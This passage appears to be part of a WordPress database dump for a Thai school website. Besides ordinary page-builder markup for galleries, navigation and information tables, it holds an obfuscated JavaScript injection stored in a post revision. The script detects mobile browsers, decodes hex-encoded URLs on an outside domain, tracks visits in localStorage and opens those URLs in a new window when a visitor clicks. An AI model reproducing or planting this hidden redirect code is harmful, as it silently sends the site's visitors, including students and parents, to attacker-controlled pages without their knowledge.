)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:51:10','2024-08-07 14:51:10','',14,'http://pakhaeng.ssk.in.th/?p=673',0,'revision','',0),
(675,1,'2024-08-07 21:51:40','2024-08-07 14:51:40','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 